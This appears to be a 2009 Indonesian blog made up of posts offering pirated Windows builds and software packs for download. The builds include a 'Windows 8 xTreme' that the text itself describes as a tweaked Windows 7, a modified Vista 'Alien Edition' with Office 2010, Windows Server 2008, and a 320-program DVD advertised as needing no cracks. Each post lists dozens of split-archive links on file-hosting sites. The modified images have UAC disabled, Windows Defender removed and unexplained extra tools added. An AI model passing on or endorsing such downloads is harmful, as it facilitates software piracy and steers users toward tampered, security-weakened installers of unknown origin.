Kamis, 03 September 2009

Windows 8 Ultimate xTreme



Windows 8 Ultimate xTreme | 2.45 GB

Windows 8 xTreme™ its a System based on Windows 7 F!nal:
-Windows 8 xTreme™ doesn't have any components removed from Original Windows 7 Image so you wont lose any compatibly with software, hardware or miss any stuff at all.

-Windows 8 xTreme™ its a Clean Windows 7 Image with a compilation of the best tweaks and a new integrated look... keeping all new features like superbar, etc...
-Windows 8 xTreme™ has been tested in a real machine with a compilation of over 200 softwares...
-All default applications are silently installed before StartUp...
Author : skat666


___________________
Tweaks:
* UAC Disabled
* Take Ownership
* Show File Extensions
* Automatic Defragmentation with Diskeeper
* New Cmd File to Right Click
* Enabled Search System Folders in Search
* ClearType
* Windows Will Tell You Exactly What it is Doing When it is Shutting Down or is Booting
* Increase Network Throughput
* ... many tweaks for IE8
* ... many more tweaks for W7...

Design:
* New Windows 7 Themes
* New Start Button
* New Cursor 3D
* New Hd Wallpapers
* New Hd System Icons Integrated In System
* New User Account Pics
* New Windows Scheme Sounds
* New Logon Screen
* ... and more

Extra Toos Integrated In System:
* SPTD

Download:

http://rapidshare.com/files/274593956/Forever-W8_www.dl4all.com.part01.rar

http://rapidshare.com/files/274594747/Forever-W8_www.dl4all.com.part02.rar

http://rapidshare.com/files/274593946/Forever-W8_www.dl4all.com.part03.rar

http://rapidshare.com/files/274594559/Forever-W8_www.dl4all.com.part04.rar

http://rapidshare.com/files/274602428/Forever-W8_www.dl4all.com.part05.rar

http://rapidshare.com/files/274602434/Forever-W8_www.dl4all.com.part06.rar

http://rapidshare.com/files/274602678/Forever-W8_www.dl4all.com.part07.rar

http://rapidshare.com/files/274602086/Forever-W8_www.dl4all.com.part08.rar

http://rapidshare.com/files/274602351/Forever-W8_www.dl4all.com.part09.rar

http://rapidshare.com/files/274602822/Forever-W8_www.dl4all.com.part10.rar

http://rapidshare.com/files/274602492/Forever-W8_www.dl4all.com.part11.rar

http://rapidshare.com/files/274607674/Forever-W8_www.dl4all.com.part12.rar

http://rapidshare.com/files/274613812/Forever-W8_www.dl4all.com.part13.rar

http://rapidshare.com/files/274617145/Forever-W8_www.dl4all.com.part14.rar

http://rapidshare.com/files/274618642/Forever-W8_www.dl4all.com.part15.rar

http://rapidshare.com/files/274617360/Forever-W8_www.dl4all.com.part16.rar

http://rapidshare.com/files/274618802/Forever-W8_www.dl4all.com.part17.rar

http://rapidshare.com/files/274618487/Forever-W8_www.dl4all.com.part18.rar

http://rapidshare.com/files/274618678/Forever-W8_www.dl4all.com.part19.rar

http://rapidshare.com/files/274617034/Forever-W8_www.dl4all.com.part20.rar

http://rapidshare.com/files/274617055/Forever-W8_www.dl4all.com.part21.rar

http://rapidshare.com/files/274622736/Forever-W8_www.dl4all.com.part22.rar

Kamis, 06 Agustus 2009

Microsoft Windows 7 Ultimate Build 7231 X86 at High Speed



|MICROSOFT.WINDOWS.7.ULTIMATE.7231 (86bit)|Genuin e Version|Rapidshare |File Factory|
File Name: Microsoft Windows 7 Ultimate
Build: 7231
X86bit

Download:
http://rapidshare.com/files/262580318/--www.dl4all.com--Microsoft_Windows_7_Ultimate_Build_7231_X86.part01.rar
http://rapidshare.com/files/262581172/--www.dl4all.com--Microsoft_Windows_7_Ultimate_Build_7231_X86.part02.rar
http://rapidshare.com/files/262585016/--www.dl4all.com--Microsoft_Windows_7_Ultimate_Build_7231_X86.part03.rar
http://rapidshare.com/files/262586142/--www.dl4all.com--Microsoft_Windows_7_Ultimate_Build_7231_X86.part04.rar
http://rapidshare.com/files/262590115/--www.dl4all.com--Microsoft_Windows_7_Ultimate_Build_7231_X86.part05.rar
http://rapidshare.com/files/262591170/--www.dl4all.com--Microsoft_Windows_7_Ultimate_Build_7231_X86.part06.rar
http://rapidshare.com/files/262594977/--www.dl4all.com--Microsoft_Windows_7_Ultimate_Build_7231_X86.part07.rar
http://rapidshare.com/files/262596190/--www.dl4all.com--Microsoft_Windows_7_Ultimate_Build_7231_X86.part08.rar
http://rapidshare.com/files/262600300/--www.dl4all.com--Microsoft_Windows_7_Ultimate_Build_7231_X86.part09.rar
http://rapidshare.com/files/262601471/--www.dl4all.com--Microsoft_Windows_7_Ultimate_Build_7231_X86.part10.rar
http://rapidshare.com/files/262605347/--www.dl4all.com--Microsoft_Windows_7_Ultimate_Build_7231_X86.part11.rar
http://rapidshare.com/files/262605036/--www.dl4all.com--Microsoft_Windows_7_Ultimate_Build_7231_X86.part12.rar

Download Windows Server 2008 Datacenter, Enterprise, and Standard with Service Pack 2 (x86) - DVD (English) (Original, Untouched) at High Speed



Windows Server 2008 Datacenter, Enterprise, and Standard with Service Pack 2 (x86) - DVD (English) | | Original, Unotuched | ISO | Bootable | 1.89Gb

http://rapidshare.com/files/263518718/server_2008_datacenter_enterprise_standard_sp2_x86_dvd_342333_www.dl4all.com.part01.rar
http://rapidshare.com/files/263518651/server_2008_datacenter_enterprise_standard_sp2_x86_dvd_342333_www.dl4all.com.part02.rar
http://rapidshare.com/files/263518742/server_2008_datacenter_enterprise_standard_sp2_x86_dvd_342333_www.dl4all.com.part03.rar
http://rapidshare.com/files/263518710/server_2008_datacenter_enterprise_standard_sp2_x86_dvd_342333_www.dl4all.com.part04.rar
http://rapidshare.com/files/263518688/server_2008_datacenter_enterprise_standard_sp2_x86_dvd_342333_www.dl4all.com.part05.rar
http://rapidshare.com/files/263518772/server_2008_datacenter_enterprise_standard_sp2_x86_dvd_342333_www.dl4all.com.part06.rar
http://rapidshare.com/files/263519551/server_2008_datacenter_enterprise_standard_sp2_x86_dvd_342333_www.dl4all.com.part07.rar
http://rapidshare.com/files/263518760/server_2008_datacenter_enterprise_standard_sp2_x86_dvd_342333_www.dl4all.com.part08.rar
http://rapidshare.com/files/263518735/server_2008_datacenter_enterprise_standard_sp2_x86_dvd_342333_www.dl4all.com.part09.rar
http://rapidshare.com/files/263521658/server_2008_datacenter_enterprise_standard_sp2_x86_dvd_342333_www.dl4all.com.part10.rar
http://rapidshare.com/files/263519495/server_2008_datacenter_enterprise_standard_sp2_x86_dvd_342333_www.dl4all.com.part11.rar
http://rapidshare.com/files/263519569/server_2008_datacenter_enterprise_standard_sp2_x86_dvd_342333_www.dl4all.com.part12.rar
http://rapidshare.com/files/263519599/server_2008_datacenter_enterprise_standard_sp2_x86_dvd_342333_www.dl4all.com.part13.rar
http://rapidshare.com/files/263519553/server_2008_datacenter_enterprise_standard_sp2_x86_dvd_342333_www.dl4all.com.part14.rar
http://rapidshare.com/files/263519589/server_2008_datacenter_enterprise_standard_sp2_x86_dvd_342333_www.dl4all.com.part15.rar
http://rapidshare.com/files/263521690/server_2008_datacenter_enterprise_standard_sp2_x86_dvd_342333_www.dl4all.com.part16.rar
http://rapidshare.com/files/263521695/server_2008_datacenter_enterprise_standard_sp2_x86_dvd_342333_www.dl4all.com.part17.rar
http://rapidshare.com/files/263519570/server_2008_datacenter_enterprise_standard_sp2_x86_dvd_342333_www.dl4all.com.part18.rar
http://rapidshare.com/files/263519513/server_2008_datacenter_enterprise_standard_sp2_x86_dvd_342333_www.dl4all.com.part19.rar

please...enjoy in my blog :D

Minggu, 21 Juni 2009

320 Full Programs with all Final Versions and No Need for cracks



ZilZal 2009 v.2 320 Full Programs in 1 DVD | 8 GB

This DVD contains the 320 Full Programs with all Final Versions and No Need for cracks .
Run from the Autorun Icon .

Burning Programs - Compress Programs - Convert Programs - Desing Programs - Desktop Programs - Dictionaries - Flash - Graphics - Internet - Web Programs - Mobile - Multi Media - Office - Protection - Utilites - Games . (All Full)

Size: 8 GB

Download :
http://hotfile.com/dl/7195413/07e0f94/ZilZal2.dvd.2009_dl4all.com.part01.rar.html
http://hotfile.com/dl/7195414/9cdd481/ZilZal2.dvd.2009_dl4all.com.part02.rar.html
http://hotfile.com/dl/7195415/abed1aa/ZilZal2.dvd.2009_dl4all.com.part03.rar.html
http://hotfile.com/dl/7195416/a344a0c/ZilZal2.dvd.2009_dl4all.com.part04.rar.html
http://hotfile.com/dl/7195417/e02dcba/ZilZal2.dvd.2009_dl4all.com.part05.rar.html
http://hotfile.com/dl/7195418/4b1b912/ZilZal2.dvd.2009_dl4all.com.part06.rar.html
http://hotfile.com/dl/7195419/5823440/ZilZal2.dvd.2009_dl4all.com.part07.rar.html
http://hotfile.com/dl/7195420/15c6a27/ZilZal2.dvd.2009_dl4all.com.part08.rar.html
http://hotfile.com/dl/7195421/d243c1e/ZilZal2.dvd.2009_dl4all.com.part09.rar.html
http://hotfile.com/dl/7195422/7f6bf52/ZilZal2.dvd.2009_dl4all.com.part10.rar.html
http://hotfile.com/dl/7195423/0a20d42/ZilZal2.dvd.2009_dl4all.com.part11.rar.html
http://hotfile.com/dl/7195424/ccafd14/ZilZal2.dvd.2009_dl4all.com.part12.rar.html
http://hotfile.com/dl/7195425/ea47d40/ZilZal2.dvd.2009_dl4all.com.part13.rar.html
http://hotfile.com/dl/7195426/708d6ea/ZilZal2.dvd.2009_dl4all.com.part14.rar.html
http://hotfile.com/dl/7195427/0d445ec/ZilZal2.dvd.2009_dl4all.com.part15.rar.html
http://hotfile.com/dl/7195428/408e5bc/ZilZal2.dvd.2009_dl4all.com.part16.rar.html
http://hotfile.com/dl/7196094/d25baf2/ZilZal2.dvd.2009_dl4all.com.part17.rar.html
http://hotfile.com/dl/7195430/99cab20/ZilZal2.dvd.2009_dl4all.com.part18.rar.html
http://hotfile.com/dl/7195431/67ffba9/ZilZal2.dvd.2009_dl4all.com.part19.rar.html
http://hotfile.com/dl/7195432/e179f0d/ZilZal2.dvd.2009_dl4all.com.part20.rar.html
http://hotfile.com/dl/7195433/e516c6c/ZilZal2.dvd.2009_dl4all.com.part21.rar.html
http://hotfile.com/dl/7195434/fb7d6cb/ZilZal2.dvd.2009_dl4all.com.part22.rar.html
http://hotfile.com/dl/7195435/c3bd238/ZilZal2.dvd.2009_dl4all.com.part23.rar.html
http://hotfile.com/dl/7195436/02d77a7/ZilZal2.dvd.2009_dl4all.com.part24.rar.html
http://hotfile.com/dl/7195437/5a54dd7/ZilZal2.dvd.2009_dl4all.com.part25.rar.html
http://hotfile.com/dl/7195438/cb91b54/ZilZal2.dvd.2009_dl4all.com.part26.rar.html
http://hotfile.com/dl/7195439/70bff98/ZilZal2.dvd.2009_dl4all.com.part27.rar.html
http://hotfile.com/dl/7195440/5f6a5c8/ZilZal2.dvd.2009_dl4all.com.part28.rar.html
http://hotfile.com/dl/7195441/3a3e7fe/ZilZal2.dvd.2009_dl4all.com.part29.rar.html
http://hotfile.com/dl/7195442/9a42516/ZilZal2.dvd.2009_dl4all.com.part30.rar.html
http://hotfile.com/dl/7195443/18c06a3/ZilZal2.dvd.2009_dl4all.com.part31.rar.html
http://hotfile.com/dl/7195444/a9dc9e3/ZilZal2.dvd.2009_dl4all.com.part32.rar.html
http://hotfile.com/dl/7195445/03540d1/ZilZal2.dvd.2009_dl4all.com.part33.rar.html
http://hotfile.com/dl/7195446/f121021/ZilZal2.dvd.2009_dl4all.com.part34.rar.html
http://hotfile.com/dl/7195447/189cd7c/ZilZal2.dvd.2009_dl4all.com.part35.rar.html
http://hotfile.com/dl/7195448/84d355a/ZilZal2.dvd.2009_dl4all.com.part36.rar.html
http://hotfile.com/dl/7195449/56b370e/ZilZal2.dvd.2009_dl4all.com.part37.rar.html
http://hotfile.com/dl/7195450/af49278/ZilZal2.dvd.2009_dl4all.com.part38.rar.html
http://hotfile.com/dl/7195451/bfe9831/ZilZal2.dvd.2009_dl4all.com.part39.rar.html
http://hotfile.com/dl/7195452/43fae8e/ZilZal2.dvd.2009_dl4all.com.part40.rar.html
http://hotfile.com/dl/7195453/f54cb2c/ZilZal2.dvd.2009_dl4all.com.part41.rar.html
http://hotfile.com/dl/7195454/e1db269/ZilZal2.dvd.2009_dl4all.com.part42.rar.html
http://hotfile.com/dl/7190903/ad69af3/ZilZal2.dvd.2009_dl4all.com.part43.rar.html
http://hotfile.com/dl/7195455/736479a/ZilZal2.dvd.2009_dl4all.com.part44.rar.html
http://hotfile.com/dl/7195456/3749de0/ZilZal2.dvd.2009_dl4all.com.part45.rar.html
http://hotfile.com/dl/7195457/c594d0b/ZilZal2.dvd.2009_dl4all.com.part46.rar.html
http://hotfile.com/dl/7195458/49888ca/ZilZal2.dvd.2009_dl4all.com.part47.rar.html
http://hotfile.com/dl/7195459/742cabd/ZilZal2.dvd.2009_dl4all.com.part48.rar.html
http://hotfile.com/dl/7195460/5958fcb/ZilZal2.dvd.2009_dl4all.com.part49.rar.html
http://hotfile.com/dl/7195461/792fa4b/ZilZal2.dvd.2009_dl4all.com.part50.rar.html
http://hotfile.com/dl/7195462/bdea146/ZilZal2.dvd.2009_dl4all.com.part51.rar.html
http://hotfile.com/dl/7195463/8b5045a/ZilZal2.dvd.2009_dl4all.com.part52.rar.html
http://hotfile.com/dl/7195464/4cda0f5/ZilZal2.dvd.2009_dl4all.com.part53.rar.html
http://hotfile.com/dl/7190904/d7df4dc/ZilZal2.dvd.2009_dl4all.com.part54.rar.html
http://hotfile.com/dl/7190905/b7a31e7/ZilZal2.dvd.2009_dl4all.com.part55.rar.html
http://hotfile.com/dl/7190906/53b5960/ZilZal2.dvd.2009_dl4all.com.part56.rar.html
http://hotfile.com/dl/7190907/16dabfe/ZilZal2.dvd.2009_dl4all.com.part57.rar.html
http://hotfile.com/dl/7190908/33ae24c/ZilZal2.dvd.2009_dl4all.com.part58.rar.html
http://hotfile.com/dl/7190909/d6ed00f/ZilZal2.dvd.2009_dl4all.com.part59.rar.html
http://hotfile.com/dl/7190910/d7d34a9/ZilZal2.dvd.2009_dl4all.com.part60.rar.html
http://hotfile.com/dl/7190911/7899865/ZilZal2.dvd.2009_dl4all.com.part61.rar.html
http://hotfile.com/dl/7190912/4debd84/ZilZal2.dvd.2009_dl4all.com.part62.rar.html
http://hotfile.com/dl/7195465/3581cd4/ZilZal2.dvd.2009_dl4all.com.part63.rar.html
http://hotfile.com/dl/7195466/f76621d/ZilZal2.dvd.2009_dl4all.com.part64.rar.html
http://hotfile.com/dl/7190914/177688e/ZilZal2.dvd.2009_dl4all.com.part65.rar.html
http://hotfile.com/dl/7190915/6938655/ZilZal2.dvd.2009_dl4all.com.part66.rar.html
http://hotfile.com/dl/7190916/83472da/ZilZal2.dvd.2009_dl4all.com.part67.rar.html
http://hotfile.com/dl/7190917/6505576/ZilZal2.dvd.2009_dl4all.com.part68.rar.html
http://hotfile.com/dl/7195467/36047f2/ZilZal2.dvd.2009_dl4all.com.part69.rar.html
http://hotfile.com/dl/7195468/ab0893d/ZilZal2.dvd.2009_dl4all.com.part70.rar.html
http://hotfile.com/dl/7195469/4a4e865/ZilZal2.dvd.2009_dl4all.com.part71.rar.html
http://hotfile.com/dl/7195470/e89a4a6/ZilZal2.dvd.2009_dl4all.com.part72.rar.html
http://hotfile.com/dl/7190918/bd5eb41/ZilZal2.dvd.2009_dl4all.com.part73.rar.html
http://hotfile.com/dl/7190919/6d8a5ca/ZilZal2.dvd.2009_dl4all.com.part74.rar.html
http://hotfile.com/dl/7190920/2d6d869/ZilZal2.dvd.2009_dl4all.com.part75.rar.html
http://hotfile.com/dl/7190921/d1a052a/ZilZal2.dvd.2009_dl4all.com.part76.rar.html
http://hotfile.com/dl/7190922/3254296/ZilZal2.dvd.2009_dl4all.com.part77.rar.html
http://hotfile.com/dl/7190923/aa2b854/ZilZal2.dvd.2009_dl4all.com.part78.rar.html
http://hotfile.com/dl/7190924/a67ddcf/ZilZal2.dvd.2009_dl4all.com.part79.rar.html
http://hotfile.com/dl/7190925/60be53b/ZilZal2.dvd.2009_dl4all.com.part80.rar.html
http://hotfile.com/dl/7190926/fe33777/ZilZal2.dvd.2009_dl4all.com.part81.rar.html
http://hotfile.com/dl/7190927/ba71763/ZilZal2.dvd.2009_dl4all.com.part82.rar.html
http://hotfile.com/dl/7190928/c5c31e9/ZilZal2.dvd.2009_dl4all.com.part83.rar.html
http://hotfile.com/dl/7190929/1fae526/ZilZal2.dvd.2009_dl4all.com.part84.rar.html
http://hotfile.com/dl/7190930/cd301d5/ZilZal2.dvd.2009_dl4all.com.part85.rar.html

OR
http://rapidshare.com/files/246079988/ZilZal2.dvd.2009_dl4all.com.part01.rar
http://rapidshare.com/files/246080064/ZilZal2.dvd.2009_dl4all.com.part02.rar
http://rapidshare.com/files/246079700/ZilZal2.dvd.2009_dl4all.com.part03.rar
http://rapidshare.com/files/246079870/ZilZal2.dvd.2009_dl4all.com.part04.rar
http://rapidshare.com/files/246080135/ZilZal2.dvd.2009_dl4all.com.part05.rar
http://rapidshare.com/files/246079771/ZilZal2.dvd.2009_dl4all.com.part06.rar
http://rapidshare.com/files/246079584/ZilZal2.dvd.2009_dl4all.com.part07.rar
http://rapidshare.com/files/246079796/ZilZal2.dvd.2009_dl4all.com.part08.rar
http://rapidshare.com/files/246079644/ZilZal2.dvd.2009_dl4all.com.part09.rar
http://rapidshare.com/files/246079986/ZilZal2.dvd.2009_dl4all.com.part10.rar
http://rapidshare.com/files/246080183/ZilZal2.dvd.2009_dl4all.com.part11.rar
http://rapidshare.com/files/246080068/ZilZal2.dvd.2009_dl4all.com.part12.rar
http://rapidshare.com/files/246080107/ZilZal2.dvd.2009_dl4all.com.part13.rar
http://rapidshare.com/files/246079860/ZilZal2.dvd.2009_dl4all.com.part14.rar
http://rapidshare.com/files/246079819/ZilZal2.dvd.2009_dl4all.com.part15.rar
http://rapidshare.com/files/246080168/ZilZal2.dvd.2009_dl4all.com.part16.rar
http://rapidshare.com/files/246079532/ZilZal2.dvd.2009_dl4all.com.part17.rar
http://rapidshare.com/files/246079924/ZilZal2.dvd.2009_dl4all.com.part18.rar
http://rapidshare.com/files/246080141/ZilZal2.dvd.2009_dl4all.com.part19.rar
http://rapidshare.com/files/246079748/ZilZal2.dvd.2009_dl4all.com.part20.rar
http://rapidshare.com/files/246080041/ZilZal2.dvd.2009_dl4all.com.part21.rar
http://rapidshare.com/files/246079778/ZilZal2.dvd.2009_dl4all.com.part22.rar
http://rapidshare.com/files/246079957/ZilZal2.dvd.2009_dl4all.com.part23.rar
http://rapidshare.com/files/246079743/ZilZal2.dvd.2009_dl4all.com.part24.rar
http://rapidshare.com/files/246079816/ZilZal2.dvd.2009_dl4all.com.part25.rar
http://rapidshare.com/files/246079533/ZilZal2.dvd.2009_dl4all.com.part26.rar
http://rapidshare.com/files/246079883/ZilZal2.dvd.2009_dl4all.com.part27.rar
http://rapidshare.com/files/246080077/ZilZal2.dvd.2009_dl4all.com.part28.rar
http://rapidshare.com/files/246080055/ZilZal2.dvd.2009_dl4all.com.part29.rar
http://rapidshare.com/files/246107114/ZilZal2.dvd.2009_dl4all.com.part30.rar
http://rapidshare.com/files/246107104/ZilZal2.dvd.2009_dl4all.com.part31.rar
http://rapidshare.com/files/246107200/ZilZal2.dvd.2009_dl4all.com.part32.rar
http://rapidshare.com/files/246107087/ZilZal2.dvd.2009_dl4all.com.part33.rar
http://rapidshare.com/files/246109751/ZilZal2.dvd.2009_dl4all.com.part34.rar
http://rapidshare.com/files/246110823/ZilZal2.dvd.2009_dl4all.com.part35.rar
http://rapidshare.com/files/246110492/ZilZal2.dvd.2009_dl4all.com.part36.rar
http://rapidshare.com/files/246110197/ZilZal2.dvd.2009_dl4all.com.part37.rar
http://rapidshare.com/files/246109317/ZilZal2.dvd.2009_dl4all.com.part38.rar
http://rapidshare.com/files/246110048/ZilZal2.dvd.2009_dl4all.com.part39.rar
http://rapidshare.com/files/246109932/ZilZal2.dvd.2009_dl4all.com.part40.rar
http://rapidshare.com/files/246109459/ZilZal2.dvd.2009_dl4all.com.part41.rar
http://rapidshare.com/files/246109847/ZilZal2.dvd.2009_dl4all.com.part42.rar
http://rapidshare.com/files/246110067/ZilZal2.dvd.2009_dl4all.com.part43.rar
http://rapidshare.com/files/246109080/ZilZal2.dvd.2009_dl4all.com.part44.rar
http://rapidshare.com/files/246109861/ZilZal2.dvd.2009_dl4all.com.part45.rar
http://rapidshare.com/files/246110403/ZilZal2.dvd.2009_dl4all.com.part46.rar
http://rapidshare.com/files/246109485/ZilZal2.dvd.2009_dl4all.com.part47.rar
http://rapidshare.com/files/246109031/ZilZal2.dvd.2009_dl4all.com.part48.rar
http://rapidshare.com/files/246109700/ZilZal2.dvd.2009_dl4all.com.part49.rar
http://rapidshare.com/files/246109726/ZilZal2.dvd.2009_dl4all.com.part50.rar
http://rapidshare.com/files/246109698/ZilZal2.dvd.2009_dl4all.com.part51.rar
http://rapidshare.com/files/246107108/ZilZal2.dvd.2009_dl4all.com.part52.rar
http://rapidshare.com/files/246107117/ZilZal2.dvd.2009_dl4all.com.part53.rar
http://rapidshare.com/files/246109542/ZilZal2.dvd.2009_dl4all.com.part54.rar
http://rapidshare.com/files/246107112/ZilZal2.dvd.2009_dl4all.com.part55.rar
http://rapidshare.com/files/246107116/ZilZal2.dvd.2009_dl4all.com.part56.rar
http://rapidshare.com/files/246110132/ZilZal2.dvd.2009_dl4all.com.part57.rar
http://rapidshare.com/files/246109302/ZilZal2.dvd.2009_dl4all.com.part58.rar
http://rapidshare.com/files/246112211/ZilZal2.dvd.2009_dl4all.com.part59.rar
http://rapidshare.com/files/246118320/ZilZal2.dvd.2009_dl4all.com.part60.rar
http://rapidshare.com/files/246120620/ZilZal2.dvd.2009_dl4all.com.part61.rar
http://rapidshare.com/files/246117553/ZilZal2.dvd.2009_dl4all.com.part62.rar
http://rapidshare.com/files/246117722/ZilZal2.dvd.2009_dl4all.com.part63.rar
http://rapidshare.com/files/246119093/ZilZal2.dvd.2009_dl4all.com.part64.rar
http://rapidshare.com/files/246118336/ZilZal2.dvd.2009_dl4all.com.part65.rar
http://rapidshare.com/files/246120381/ZilZal2.dvd.2009_dl4all.com.part66.rar
http://rapidshare.com/files/246118525/ZilZal2.dvd.2009_dl4all.com.part67.rar
http://rapidshare.com/files/246117452/ZilZal2.dvd.2009_dl4all.com.part68.rar
http://rapidshare.com/files/246117140/ZilZal2.dvd.2009_dl4all.com.part69.rar
http://rapidshare.com/files/246118554/ZilZal2.dvd.2009_dl4all.com.part70.rar
http://rapidshare.com/files/246120815/ZilZal2.dvd.2009_dl4all.com.part71.rar
http://rapidshare.com/files/246120086/ZilZal2.dvd.2009_dl4all.com.part72.rar
http://rapidshare.com/files/246117956/ZilZal2.dvd.2009_dl4all.com.part73.rar
http://rapidshare.com/files/246120034/ZilZal2.dvd.2009_dl4all.com.part74.rar
http://rapidshare.com/files/246117891/ZilZal2.dvd.2009_dl4all.com.part75.rar
http://rapidshare.com/files/246117289/ZilZal2.dvd.2009_dl4all.com.part76.rar
http://rapidshare.com/files/246121352/ZilZal2.dvd.2009_dl4all.com.part77.rar
http://rapidshare.com/files/246117458/ZilZal2.dvd.2009_dl4all.com.part78.rar
http://rapidshare.com/files/246117431/ZilZal2.dvd.2009_dl4all.com.part79.rar
http://rapidshare.com/files/246118251/ZilZal2.dvd.2009_dl4all.com.part80.rar
http://rapidshare.com/files/246120326/ZilZal2.dvd.2009_dl4all.com.part81.rar
http://rapidshare.com/files/246117574/ZilZal2.dvd.2009_dl4all.com.part82.rar
http://rapidshare.com/files/246120245/ZilZal2.dvd.2009_dl4all.com.part83.rar
http://rapidshare.com/files/246116919/ZilZal2.dvd.2009_dl4all.com.part84.rar
http://rapidshare.com/files/246116830/ZilZal2.dvd.2009_dl4all.com.part85.rar

Rabu, 17 Juni 2009

Windows Vista Alien Edition V2 x86 SP2 2009 with Office 2010


Windows Vista Alien Edition V2 x86 SP2 2009 with Office 2010 | 2.27 GB

Based on Windows Vista Ultimate x86 SP2 + Office 2010
Size of ISO : 2.27 GB

Modified :
Media Center
Firewall
Defender
Security Center
Default Wallpapers
Themes
Setup
Gadgets
Media Player

Pre Installed :
Java
Adobe Flash Player
Shockwave Player

Other addons:
Microsoft Office 2010
Firefox 3.0.10
7Zip
CCleaner
TuneUp Utilities 2009
WinRAR
Windows Live Web Installer
Adobe Reader

Updates Added :
Fix for KB935509
Fix for KB938371
Fix for KB937287
Fix for KB955430
Fix for KB942288
Fix for KB929327
Dreamscene Packs

Removed :
*Accessories
Accessibility
Speech Support
Welcome Center

*Drivers
Modems
Printers

*Games
Game Explorer
Inbox Games
Premium Inbox Games

*Hardware Support
Internet Small Computer System Interface (iSCSI)

*Language
Korean
Simplified Chinese
Traditional Chinese
Japanese

*Multi Media
Screensavers
Windows Media Samples
Movie and DVD Maker

*System
BitLocker Drive Encryption
Help
Microsoft Agent
Natural Language
Tablet PC
Windows Defender
Windows Easy Transfer

Download:
http://hotfile.com/dl/6803830/14aa41a/
Vista.Alien2.sp2_dl4all.com.part01.rar.html
http://hotfile.com/dl/6803831/3c9bd61/
Vista.Alien2.sp2_dl4all.com.part02.rar.html
http://hotfile.com/dl/6803832/cee6e99/
Vista.Alien2.sp2_dl4all.com.part03.rar.html
http://hotfile.com/dl/6803833/b14026d/
Vista.Alien2.sp2_dl4all.com.part04.rar.html
http://hotfile.com/dl/6803834/d8f3561/
Vista.Alien2.sp2_dl4all.com.part05.rar.html
http://hotfile.com/dl/6803835/39d05f5/
Vista.Alien2.sp2_dl4all.com.part06.rar.html
http://hotfile.com/dl/6803836/6d3fe35/
Vista.Alien2.sp2_dl4all.com.part07.rar.html
http://hotfile.com/dl/6803837/b133afb/
Vista.Alien2.sp2_dl4all.com.part08.rar.html
http://hotfile.com/dl/6803838/3381029/
Vista.Alien2.sp2_dl4all.com.part09.rar.html
http://hotfile.com/dl/6803839/5a82c1a/
Vista.Alien2.sp2_dl4all.com.part10.rar.html
http://hotfile.com/dl/6803840/0019e79/
Vista.Alien2.sp2_dl4all.com.part11.rar.html
http://hotfile.com/dl/6803841/2b78c35/
Vista.Alien2.sp2_dl4all.com.part12.rar.html
http://hotfile.com/dl/6803842/ecc3820/
Vista.Alien2.sp2_dl4all.com.part13.rar.html
http://hotfile.com/dl/6803843/90aee73/
Vista.Alien2.sp2_dl4all.com.part14.rar.html
http://hotfile.com/dl/6803844/bbdb59a/
Vista.Alien2.sp2_dl4all.com.part15.rar.html
http://hotfile.com/dl/6803845/06ebef7/
Vista.Alien2.sp2_dl4all.com.part16.rar.html
http://hotfile.com/dl/6803846/f968792/
Vista.Alien2.sp2_dl4all.com.part17.rar.html
http://hotfile.com/dl/6803847/7790452/
Vista.Alien2.sp2_dl4all.com.part18.rar.html
http://hotfile.com/dl/6803848/8522b7a/
Vista.Alien2.sp2_dl4all.com.part19.rar.html
http://hotfile.com/dl/6803849/8eda5e9/
Vista.Alien2.sp2_dl4all.com.part20.rar.html
http://hotfile.com/dl/6803850/73d2182/
Vista.Alien2.sp2_dl4all.com.part21.rar.html
http://hotfile.com/dl/6803851/ba171ba/
Vista.Alien2.sp2_dl4all.com.part22.rar.html

OR :
http://uploading.com/files/CL6OEBAD/
Vista.Alien2.sp2_dl4all.com.part01.rar.html
http://uploading.com/files/FX7H8KMC/
Vista.Alien2.sp2_dl4all.com.part02.rar.html
http://uploading.com/files/DXWWNP7M/
Vista.Alien2.sp2_dl4all.com.part03.rar.html
http://uploading.com/files/U73EAB6D/
Vista.Alien2.sp2_dl4all.com.part04.rar.html
http://uploading.com/files/P4DKUJOG/
Vista.Alien2.sp2_dl4all.com.part05.rar.html
http://uploading.com/files/9YB43TLZ/
Vista.Alien2.sp2_dl4all.com.part06.rar.html
http://uploading.com/files/JPM22B8I/
Vista.Alien2.sp2_dl4all.com.part07.rar.html
http://uploading.com/files/6JKRLFBN/
Vista.Alien2.sp2_dl4all.com.part08.rar.html
http://uploading.com/files/755BBMS5/
Vista.Alien2.sp2_dl4all.com.part09.rar.html
http://uploading.com/files/37Q7WSKV/
Vista.Alien2.sp2_dl4all.com.part10.rar.html
http://uploading.com/files/0FKPQ6YJ/
Vista.Alien2.sp2_dl4all.com.part11.rar.html
http://uploading.com/files/GPNQMV3Q/
Vista.Alien2.sp2_dl4all.com.part12.rar.html
http://uploading.com/files/MEJWR6JM/
Vista.Alien2.sp2_dl4all.com.part13.rar.html
http://uploading.com/files/D2TYAO4G/
Vista.Alien2.sp2_dl4all.com.part14.rar.html
http://uploading.com/files/CUPLUHZA/
Vista.Alien2.sp2_dl4all.com.part15.rar.html
http://uploading.com/files/PKUU7SWQ/
Vista.Alien2.sp2_dl4all.com.part16.rar.html
http://uploading.com/files/GKX9JTUQ/
Vista.Alien2.sp2_dl4all.com.part17.rar.html
http://uploading.com/files/PO3MIELT/
Vista.Alien2.sp2_dl4all.com.part18.rar.html
http://uploading.com/files/6SV4TZ5T/
Vista.Alien2.sp2_dl4all.com.part19.rar.html
http://uploading.com/files/ZG950P6O/
Vista.Alien2.sp2_dl4all.com.part20.rar.html
http://uploading.com/files/R1QISYFP/
Vista.Alien2.sp2_dl4all.com.part21.rar.html
http://uploading.com/files/RARBOHQT/
Vista.Alien2.sp2_dl4all.com.part22.rar.html

OR :
http://www.filefactory.com/file/ag69400/n/
Keosoft90_VisAE2_part01_rar
http://www.filefactory.com/file/ag696dg/n/
Keosoft90_VisAE2_part02_rar
http://www.filefactory.com/file/ag69539/n/
Keosoft90_VisAE2_part03_rar
http://www.filefactory.com/file/ag6940d/n/
Keosoft90_VisAE2_part04_rar
http://www.filefactory.com/file/ag6955b/n/
Keosoft90_VisAE2_part05_rar
http://www.filefactory.com/file/ag695b0/n/
Keosoft90_VisAE2_part06_rar
http://www.filefactory.com/file/ag6940e/n/
Keosoft90_VisAE2_part07_rar
http://www.filefactory.com/file/ag695ba/n/
Keosoft90_VisAE2_part08_rar
http://www.filefactory.com/file/ag694h3/n/
Keosoft90_VisAE2_part09_rar
http://www.filefactory.com/file/ag694h5/n/
Keosoft90_VisAE2_part10_rar
http://www.filefactory.com/file/ag694h6/n/
Keosoft90_VisAE2_part11_rar
